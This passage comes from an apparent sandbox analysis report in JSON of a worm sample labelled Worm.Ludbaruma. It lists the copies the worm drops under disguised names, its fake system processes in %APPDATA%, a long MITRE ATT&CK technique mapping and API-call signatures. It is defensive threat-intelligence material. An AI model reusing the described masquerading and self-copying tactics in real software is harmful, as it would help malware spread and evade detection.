"06ca7c393fd015fa9fcabbe762dcd5c177f950f238cb3727251139c785e5494c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Mig2.scr", "file_path": "%WINDIR%\\System32\\Mig2.scr", "file_size": 167965, "sha256": "cd3ccb2261b82ebea6b5da66ccc30bd1656d1f60eff7c8c946c183a6fa26bc18", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 167965, "sha256": "d50eae68b002ee5211382698b9cae49e21fb5f53d3b26e30aa721b75fd3d4e99", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xk.exe", "file_path": "%WINDIR%\\xk.exe", "file_size": 167965, "sha256": "f79cdea8c774e7b3eb6d2c906c34f2ee422b49136715354fcb413ee1eec9e968", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_path": "C:\\Data %OSUSER%.exe", "file_size": 167965, "sha256": "80106a33788f458db2712e9a95a53cff7df4928096e8a07d9a9dcb8c0c66ebcb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Folder.htt", "file_path": "C:\\XK\\Folder.htt", "file_size": 640, "sha256": "fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061", "type_tags": ["html"], "description": "HTML document, ASCII text, with CRLF line terminators", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_path": "C:\\XK\\New Folder.exe", "file_size": 167965, "sha256": "096af68cf9a86979496032d650bf872d5ad4d263d73a117c55005fee42fb6cb2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xk.exe", "file_path": "C:\\xk.exe", "file_size": 167965, "sha256": "3e5c7c076d49c714ad6784a80bcb6cdae8a42c8db2a59d019a79b8d9c9934693", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "mapisvc.inf", "file_size": 1122, "sha256": "7bfe1f3691e2b4fb4d61fbf5e9f7782fbe49da1342dbd32201c2cc8e540dbd1a", "type_tags": ["text"], "description": "Unicode text, UTF-16, little-endian text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_1C306CB1-771E-4B4B-A902-86E897877F5B_.png", "file_size": 605, "sha256": "296526f9a716c1aa91ba5d6f69f0eb92fdf79c2cb2cfcf0ceb22b7ccbc27035f", "type_tags": ["image", "png"], "description": "PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Stream_ConversationPrefs_2_3E0178D0DAF4F7498AEB469B68E04572.dat", "file_size": 314, "sha256": "ad1bba6e46aac67ad68d992f7703c795e360ba887103ee75452c16a6da65d717", "type_tags": ["text"], "description": "XML 1.0 document, ASCII text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "firstrun.log", "file_size": 111, "sha256": "76de81a904fb665d23c631b83e563227d58414e9b1238e37338b28a4d510dd34", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "XK.EXE.67E3CBAF.bin", "file_size": 167965, "sha256": "f79cdea8c774e7b3eb6d2c906c34f2ee422b49136715354fcb413ee1eec9e968", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67E3CBB1.bin", "file_size": 167965, "sha256": "06ca7c393fd015fa9fcabbe762dcd5c177f950f238cb3727251139c785e5494c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005328", "name": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe", "normalized_path": "C:\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe", "sha256": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033", "av_label": "Worm.Ludbaruma", "av_matched": 21, "av_total": 24}, {"uid": "00000000-00003688", "parentuid": "00000000-00005328", "name": "xk.exe", "normalized_path": "%WINDIR%\\xk.exe", "sha256": "f79cdea8c774e7b3eb6d2c906c34f2ee422b49136715354fcb413ee1eec9e968"}, {"uid": "00000000-00005180", "parentuid": "00000000-00005328", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "06ca7c393fd015fa9fcabbe762dcd5c177f950f238cb3727251139c785e5494c"}, {"uid": "00000000-00004256", "parentuid": "00000000-00005328", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "72eccd5f3b25bd73285f218f3eec7580ac6e2448084e0f7f8c7d8405305f4825"}, {"uid": "00000000-00005476", "parentuid": "00000000-00005328", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "a7685fa2f5b3adfc9ed1cefd39d53074d48b9639d415f51d8c8207bc08b0b073"}, {"uid": "00000000-00001968", "parentuid": "00000000-00005328", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "184e4ccf531c3d2d3b614720fb0d3e7f2ef45a764a07d316f13e84b066a020a5"}, {"uid": "00000000-00003760", "parentuid": "00000000-00005328", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "8cb57c624d6f656ef87cec9740a5d8325c7e8175d4f1ae81a1f7e46037aad355"}, {"uid": "00000000-00005196", "parentuid": "00000000-00005328", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "0380022a10f4bb4fd5804ffd53b3053da22fb73a6f123561b4ee632a3d93beee"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Office Application Startup", "attck_id": "T1137", "attck_id_wiki": "https://attack.mitre.org/techniques/T1137", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Screensaver", "attck_id": "T1546.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Screensaver", "attck_id": "T1546.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Local Account", "attck_id": "T1087.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087/001", "informative_identifiers_count": 1, "parent": {"technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %WINDIR%\\xk.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location C:\\xk.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy 